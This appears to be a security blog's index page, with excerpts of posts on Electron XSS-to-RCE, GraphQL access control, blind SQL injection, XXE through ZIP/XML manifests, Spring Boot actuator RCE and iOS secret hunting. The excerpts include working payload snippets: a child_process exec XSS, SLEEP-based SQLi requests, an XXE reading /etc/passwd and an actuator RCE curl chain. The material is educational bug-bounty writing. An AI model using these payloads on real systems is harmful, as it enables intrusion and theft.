spaceraccoon.dev

Introduction: Red Alert!

Last month, the Centre for Strategic Infocomm Technologies (CSIT) invited local cybersecurity enthusiasts to tackle the InfoSecurity Challenge (TISC). The Challenge was organized in a capture-the-flag format, with 6 cybersecurity and programming challenges of increasing difficulty unlocked one after another.

On New Year’s Eve, hackers from the PALINDROME group launched a ransomware attack on a major finance company and encrypted some of its critical data servers. Your mission is to complete a series of tasks to recover as much data as possible to prevent the company from having to give in to PALINDROME's demand. The tasks will increase in difficulty as you go along so be prepared to put up the fight of your life.

With this exciting introduction, I tackled a series of difficult problems that encompassed reverse engineering, binary exploitation, and cryptography. This took me far out of my comfort zone of application security, but since I wanted to build my skills in those areas, it was a welcome challenge.

Read more...

It's Node's World – We Just Live In It

For better or worse, Node.js has rocketed up the developer popularity charts. Thanks to frameworks like React, React Native, and Electron, developers can easily build clients for web, mobile, and desktop platforms. These clients are delivered in what are essentially thin wrappers around a single JavaScript file.

As with any modern convenience, there are tradeoffs. On the security side of things, moving routing and templating logic to the client side makes it easier for attackers to discover unused API endpoints, unobfuscated secrets, and more. Check out Webpack Exploder, a tool I wrote that decompiles Webpacked React applications into their original source code.

On the desktop, Electron applications are even easier to decompile and debug. Instead of wading through Ghidra/Radare2/IDA and heaps of assembly code, attackers can use Electron's built-in Chromium DevTools. Meanwhile, Electron's documentation recommends packaging applications into asar archives, a tar-like format that can be unpacked with a simple one-liner.
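
For instance, extracting the bundled source is a one-liner (a minimal sketch, assuming the app ships its code in the default resources/app.asar location):

npx @electron/asar extract resources/app.asar unpacked/

From there, the full JavaScript source sits in unpacked/ and can be read or patched directly.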

With the source code, attackers can search for client-side vulnerabilities and escalate them to code execution. No funky buffer overflows needed – Electron's nodeIntegration setting puts applications one XSS away from popping calc.
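
To illustrate (my own example, not from the original post): with nodeIntegration enabled, a single injected tag in the renderer is enough to reach Node's child_process module and spawn a process.

<img src="x" onerror="require('child_process').exec('calc')">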

Read more...

This article was originally posted on my company's Medium blog. If you'd like to support me, give a clap and follow my Medium profile!

Introduction

GraphQL is a modern query language for Application Programming Interfaces (APIs). Supported by Facebook and the GraphQL Foundation, GraphQL grew quickly and has entered the early majority phase of the technology adoption cycle, with major industry players like Shopify, GitHub and Amazon coming on board.

[Figure: Innovation Adoption Lifecycle]

As with the rise of any new technology, GraphQL came with growing pains, especially for developers implementing it for the first time. While GraphQL promises greater flexibility and power than traditional REST APIs, it can also increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities.
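
As a quick illustration of that attack surface (the endpoint and field names here are hypothetical), a single GraphQL query can fetch nested objects directly by ID, so authorization checks applied only to list-style queries are easily sidestepped:

curl -s -X POST 'https://api.example.com/graphql' \
  -H 'Content-Type: application/json' \
  -d '{"query":"{ user(id: 1337) { email privateNotes } }"}'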

Read more...

Motivation

Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities.

Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response.
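
One way to work around the lack of feedback is to infer the injection from side effects such as response time. A rough sketch (the endpoint and parameter are made up, and SLEEP() assumes a MySQL backend):

time curl -s -o /dev/null "https://example.com/items?id=1'+AND+SLEEP(0)--+-"
time curl -s -o /dev/null "https://example.com/items?id=1'+AND+SLEEP(5)--+-"

If the second request consistently takes about five seconds longer, the parameter is likely injectable even though the response body never changes.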

Read more...

XML and ZIP – A Tale as Old As Time

While researching a bug bounty target, I came across a web application that processed a custom file type. Let's call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.

This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:

Archive:  Document.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
  inflating: word/settings.xml       
  inflating: docProps/core.xml       
  inflating: word/fontTable.xml      
  inflating: word/webSettings.xml    
  inflating: word/styles.xml         
  inflating: docProps/app.xml        

Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.

However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.
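
For example, here is a hypothetical repacking sketch (the manifest name and elements are made up): planting an external entity declaration in the package's XML manifest turns a naive server-side XML parser into a file-read primitive, the classic XXE attack.

cat > manifest.xml <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE package [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<package><title>&xxe;</title></package>
EOF
zip payload.xyz manifest.xml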

Read more...

Prelude

Spring Boot is one of the most popular Java-based microservice frameworks, helping developers quickly and easily build and deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process.

However, these development defaults can become dangerous in the hands of inexperienced developers. My write-up expands on the work of Michael Stepankin, who researched ways to exploit exposed actuators in Spring Boot 1.x and achieve RCE via deserialization. I provide an updated RCE method via Spring Boot 2.x's default HikariCP database connection pool and a common Java development database, the H2 Database Engine. I also created a sample Spring Boot application based on Spring Boot's default tutorial application to demonstrate the exploit.
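
The core of the chain looks roughly like this (my own sketch, assuming the env and restart actuators are exposed and the app uses HikariCP with an H2 datasource; the H2 payload is abbreviated):

# Point HikariCP's connection test query at attacker-controlled H2 SQL
curl -X POST 'http://target:8080/actuator/env' -H 'Content-Type: application/json' \
  -d '{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS ..."}'
# Restart the context so the pool is rebuilt and the test query executes
curl -X POST 'http://target:8080/actuator/restart'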

Read more...

Motivation

Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it's also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.

Most iOS applications use third-party APIs and SDKs such as Twitter, Amazon Web Services, and so on. Interacting with these APIs requires API keys, which are used (and thus stored) in the app itself. A careless developer could easily leak keys with too many privileges or keys that were never meant to be stored on the client side in the first place.
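
Hunting for them is often as simple as unpacking the IPA and grepping (a hypothetical example; the app and file names are made up):

unzip -q Target.ipa -d target/                                             # an .ipa is just a ZIP
strings 'target/Payload/Target.app/Target' | grep -E 'AKIA[0-9A-Z]{16}'    # AWS access key IDs
grep -rian --include='*.plist' -E 'api[_-]?key|client[_-]?secret' target/Payload/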

What makes finding them an easy win? As described by top iOS developer Mattt Thompson:

There’s no way to secure secrets stored on the client. Once someone can run your software on their own device, it’s game over.

And maintaining a secure, closed communications channel between client and server incurs an immense amount of operational complexity — assuming it’s possible in the first place.

He also tells us that:

Another paper published in 2018 found SDK credential misuse in 68 out of a sample of 100 popular iOS apps. (Wen, Li, Zhang, & Gu, 2018)

Until APIs and developers come round to the fact that client secrets are insecure by design, there will always be these low-hanging vulnerabilities in iOS apps.

Read more...

Updated April 19, 2020:
– Install OpenSSH through Cydia (ramsexy)
– Checkra1n now supports Linux (inhibitor181)
– Use a USB Type-A cable instead of Type-C (c0rv4x)

Updated April 26, 2020: – Linux-specific instructions (inhibitor181)

Updated August 14, 2020: – Burp TLS v1.3 configuration

Motivation

I wanted to get into mobile app pentesting. While it's relatively easy to get started on Android, it's harder to do so with iOS. For example, while Android has Android Virtual Device and a host of other third-party emulators, iOS only has Xcode's iOS Simulator, which mimics the software environment of an iPhone but not the hardware. As such, iOS app pentesting requires an actual iOS device.

Moreover, it's a major hassle to do even basic things like bypassing SSL certificate pinning. PortSwigger's Burp Suite Mobile Assistant needs to be installed onto a jailbroken device and only works on iOS 9 and below.

For the longest time, iOS pentesting guides recommended buying an old iPhone with deprecated iOS versions off eBay. More recent efforts like Yogendra Jaiswal's excellent guide are based on the Unc0ver jailbreak, which works on iOS 11.0-12.4. If you don't have an iDevice in that range, you're out of luck.

Fortunately, with the release of the checkra1n jailbreak, A5-A11 iPhones, iPads, and iPods on the latest iOS can now be jailbroken. Many iOS app pentesting tools, having lain dormant during the long winter of jailbreaking, are now catching up, and new tools are also being released.

As such, I'm writing a quickstart guide for iOS app pentesting on modern devices with the checkra1n jailbreak, consolidating different tools' setup guides in one place. I will follow up with a post on bugs I've found in iOS apps using the tools installed here.

Read more...
